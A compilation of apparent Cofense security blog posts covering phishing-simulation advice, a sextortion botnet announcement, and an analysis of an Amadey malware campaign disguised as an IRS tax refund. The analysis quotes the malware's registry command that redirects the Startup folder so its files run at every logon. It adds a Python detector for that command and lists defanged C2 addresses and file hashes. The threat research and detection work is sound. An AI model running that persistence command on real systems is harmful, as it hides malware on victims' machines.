The second template looks very simplistic, and our security awareness operator is less likely to select it. It appears too basic; nobody would actually click the message, right? Yet there is a much higher click rate on this template, which mimics a real phishing message.

So are you preparing your organization to detect and report real phishing emails? Are you preparing them to defend against the actual messages that make it past your SEG? Our data shows that keeping it real makes a real difference.

View our report to learn other ways to double your resiliency to phishing.


HOW ELSE COFENSE CAN HELP

Most phishing threats observed by the Cofense Phishing Defense Center bypassed secure email gateways. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe™ and remove the blind spot with Cofense Reporter™.

Quickly turn user reported emails into actionable intelligence with Cofense Triage™. Reduce exposure time by rapidly quarantining threats with Cofense Vision™.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence™.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.



Cofense Labs Has Identified a Sextortion Botnet in the Wild – and it’s Growing

By Tonia Dudley, Cofense Security Solutions

Every day, Cofense™ threat analysts and researchers monitor phishing and cyber security threats in the wild. In June of 2019, our researchers uncovered a sextortion botnet that contained a list of 200 million email addresses. Read the original announcement here.

That database has since grown to over 330 million email addresses.

We have also identified an increase in the number of unique web domains being targeted by the botnet. When we released our original findings, the database had close to 6 million unique domains. That total has grown to 7.4 million unique domains.

To be clear, this threat is not a breach of any Cofense data or systems. Rather, it’s a botnet that our research team discovered out in the wild. The botnet uses email addresses and credentials which we believe were acquired via a series of breaches over the past decade. Visit our info center for additional resources.

Fig. Sample containing text as images to deceive automated analysis

Cofense Labs™ has created a sextortion lookup tool to check impacted accounts and domains, as well as a resource center with helpful tips on protecting your organization and your personal accounts from these types of threats and on the steps you can take should you receive a sextortion scam.

Cofense Labs will continue to monitor the botnet and share updates on our Twitter handles @Cofense and @CofenseLabs.

HOW COFENSE SOLUTIONS CAN HELP

Reports of sextortion and other ransom scams to the Cofense Phishing Defense Center™ are increasing. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe™ and remove the blind spot with Cofense Reporter™.


Attackers do their research. Every SaaS platform you use is an opportunity for attackers to exploit it. Understand what SaaS applications are configured for your domains – do YOUR research with Cofense CloudSeeker™.




Rethinking Security Awareness? Fine-Tune Your Simulations

Part 2 of 2

In part 1 of this short series, we gave tips on re-energizing a mature security awareness program. We noted the importance of reassessing your organization’s risk profile and communicating with users as you educate them on phishing. For part 2, let’s look at anti-phishing through the lens of simulated threats.

How to Refocus Your Phishing Simulations

If you manage a security awareness program, you need to educate users on phishing emails that land in their inboxes—active threats like malware, business email compromise (BEC), or sextortion. This means talking to your SOC to understand the threats your business faces, then running simulations of those same threats. The objective isn’t just to educate users to spot phishing but to condition them to report threats, so the SOC can respond faster.

If you’ve been running simulations for some time, here are proven ways to reinvigorate your program.

Give Users an Easy Way to Report

To repeat, reporting is what you’re after. Make it easy for ALL users to report a suspicious message by giving them an EZ button. Cofense PhishMe™ customers can (and should) deploy Cofense Reporter™, our email toolbar button that lets you report with one click.

If users don’t report threats, the SOC is blind while the danger spreads. Well-conditioned users become human sensors that send valuable threat intelligence to your security teams.

Send Targeted Simulations

As you build resiliency across your organization, send different simulations to different kinds of users: high-value targets in human resources or finance, repeat clickers, and new hires/new users. You’ll also want to continue sending campaigns to your full population.

Simulate Emerging and Active Threats

The phishing scenarios in Cofense PhishMe are based on real threats, thanks to constant input from our threat intelligence teams. For example, we see a lot of emerging threats, those observed in the wild, using phony invoices and purchase orders. Threat actors have a good understanding of how organizations process payments and emulate those methods to disarm users.

If something seems familiar, users are more likely to open an attachment or click links to file-sharing sites like SharePoint. Another example: users often feel safe using sites that display the HTTPS prefix and padlock symbol. They look for these on e-commerce sites asking them to enter personal information. There’s been an uptick in threat actors leveraging HTTPS in phishing emails, so you might use this tactic in your simulations.

Also be sure to send simulations that mirror active threats—phishing emails that get past your organization’s secure email gateway (SEG). Again, communicate with your SOC to learn the latest examples. If your organization is a Cofense Triage™ and Cofense Vision™ customer, these incident response solutions can give you deeper insight.

As your phishing awareness program matures it needs to stay current with your phishing risk. Teach users to report more nuanced attacks should they breach the perimeter. To counter today’s threats, your organization, all of it, needs to keep up with the times.



New Phishing Campaign Targets U.S. Taxpayers by Dropping Amadey Botnet

The Cofense Phishing Defense Center™ has detected a new wave of attacks targeting the US taxpayer by delivering the Amadey botnet via phishing emails. Amadey is a relatively new botnet, first noted late in Q1 of 2019. Known for its simplicity, it is available to hire for a very steep price compared to other commercially available botnets with similar functionality. Threat groups like TA505 have been known to leverage the Amadey botnet as recently as July 2019 to deliver secondary malware like the FlawedAmmyy RAT and email stealers.

Here’s how a typical attack works:

Figure 1: Infection chain

Figure 2: Email Body

The email body purports to be from the Internal Revenue Service (IRS) and claims that the recipient is eligible for a tax refund. The recipient is presented with a “one time username and password” and urged to click the “Login Right Here” button. As seen above in figure 1, the login button is an embedded hyperlink that redirects to hxxp://yosemitemanagement[.]com/fonts/page5/. Here the recipient is presented with an IRS login page to enter the one-time password.

Figure 3: Infection Page 

Once the recipient is logged into the fake IRS portal they are informed that they have “1 pending refund” and asked to download a document, print and sign, then either mail it back or upload a copy to the portal. When the recipient clicks to download the document, a zip file called “document.zip” is presented, which contains a Visual Basic script dropper.

Figure 4: Obfuscated VBScript

The VBScript is highly obfuscated and encrypted. For more details on how this VBScript was decoded, please take a look at the Cofense™ Labs detailed write-up, which can be found here.

At a high level, once executed the script decrypts itself at run time and drops an executable file called “ZjOexiPr.exe” in C:\Users\Byte\AppData\Local\Temp\. Once dropped, it installs the executable kntd.exe in C:\ProgramData\0fa42aa593 and executes it.

Figure 5: Persistence 

The Amadey process installs itself in C:\ProgramData\0fa42aa593 and, to maintain persistence, uses Reg.exe, a command-line tool for editing the registry. The script issues the command:

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\0fa42aa593

This rewrites the Startup value under User Shell Folders, the key from which Explorer reads the location of the user’s Startup folder. The malware directory thereby becomes the Startup folder, so its contents are launched at every logon.
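The registry write above is a persistence technique a SOC can alert on from process-creation command lines. The following is an added detection example, not Cofense’s code: it parses reg.exe add commands, flags any rewrite of the Startup (or Common Startup) value under User Shell Folders, and rates the hit high when the new path lies outside the usual profile locations. The sample command lines are constructed except for the first, which is the command quoted in the post; the list of expected prefixes is an assumption about where that folder normally lives.

```python
import re

# Explorer reads the location of each user's Startup folder from this key.
# Pointing its "Startup" value at an attacker-controlled directory makes every
# file there run at logon; that is the reg.exe trick the Amadey sample uses.
USER_SHELL_FOLDERS = r"explorer\user shell folders"
STARTUP_VALUES = {"startup", "common startup"}      # per-user and all-users
# Assumed prefixes under which the Startup folder legitimately lives.
EXPECTED_PREFIXES = ("%userprofile%", "%appdata%", "c:\\users\\",
                     "%programdata%\\microsoft\\", "c:\\programdata\\microsoft\\")
_TOKEN = re.compile(r'"[^"]*"|\S+')   # Windows-style quoted tokens

def parse_reg_add(cmdline):
    """Return {'key', 'value', 'data'} for a 'reg add' command line, else None."""
    argv = [t.strip('"') for t in _TOKEN.findall(cmdline)]
    if len(argv) < 3 or argv[1].lower() != "add":
        return None
    if argv[0].rsplit("\\", 1)[-1].lower() not in ("reg", "reg.exe"):
        return None
    parsed = {"key": argv[2], "value": "(Default)", "data": ""}
    for i, tok in enumerate(argv[3:-1], 3):   # /v and /d take the next token
        if tok.lower() == "/v":
            parsed["value"] = argv[i + 1]
        elif tok.lower() == "/d":
            parsed["data"] = argv[i + 1]
    return parsed

def classify(cmdline):
    """'high' if Startup is redirected outside the usual locations, 'medium' if
    the value is rewritten to an expected path, None otherwise."""
    reg = parse_reg_add(cmdline)
    if reg is None or not reg["key"].lower().endswith(USER_SHELL_FOLDERS):
        return None
    if reg["value"].lower() not in STARTUP_VALUES:
        return None
    return "medium" if reg["data"].lower().startswith(EXPECTED_PREFIXES) else "high"

def scan(cmdlines):
    """Return (line number, severity, command line) for every hit."""
    return [(n, sev, line) for n, line in enumerate(cmdlines, 1)
            if (sev := classify(line))]

# Constructed sample process command lines; the first is the command quoted in the post.
SAMPLE_CMDLINES = [
    r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\0fa42aa593',
    r'reg add HKCU\Software\Contoso\Agent /v Interval /t REG_DWORD /d 300 /f',
    r'C:\Windows\System32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Startup /t REG_EXPAND_SZ /d "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /f',
    r'cmd.exe /c whoami',
]
```

Running scan(SAMPLE_CMDLINES) reports line 1 as high and line 3 as medium; the benign reg write and the non-reg command produce no hit.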

Figure 6: C2 channels

Amadey instantly beacons out to its command and control (C2) channels, sending system diagnostic information back to the C2 server, and awaits further instructions. Amadey connects out via HTTP on port 80 to multiple C2 servers.

Figure 7: Network Traffic

If we take a closer look at the HTTP traffic, we can see that Amadey sends system information back to its C2 server.

From the values given we can infer that:

ID – Unique identifier of the infected system

VS – Version of Amadey

OS – Operating system

AV – Antivirus

PC – System name

UN – Username

Additional Analysis:

Cofense Labs takes this analysis a bit deeper to deobfuscate the malware. To learn more, check out the Lab Notes on this analysis: https://cofenselabs.com/i-see-what-you-did-there/

Indicators of Compromise (IOCs):

Malware Artifacts

File                 MD5 Hash Value
document.zip         7f9a3244d23baed3b67416e32eb949bd
a4-155QFYXY.vbs      79d24672fff4c771830b4c53a7079afe
kntd.exe             a046030e2171ddf787f06a92941d37ca

Network Connections

URL                                            IP
hxxp://yosemitemanagement[.]com/fonts/page5/   160[.]153[.]138[.]163
hxxp://ledehaptal[.]ru/f5lkB/index[.]php       78[.]40[.]109[.]187
hxxp://nofawacat[.]com/f5lkB/index[.]php       179[.]43[.]139[.]222
hxxp://Ip[.]hoster[.]kz                        192[.]4[.]58[.]78


HOW COFENSE CAN HELP

Cofense Resources

Cofense PhishMe™ offers a phishing simulation, “Tax Refund Notice – Amadey Botnet,” to educate users on the attack described in today’s blog.

89% of phishing threats delivering malware payloads analysed by the Cofense Phishing Defense Center bypassed secure email gateways. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe.

Remove the blind spot with Cofense Reporter™—give users a one-click tool to report suspicious messages, alerting security teams to potential threats.


Easily consume phishing-specific threat intelligence to proactively defend your organisation against evolving threats with Cofense Intelligence™.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand current threats, read the 2019 Phishing Threat & Malware Review.

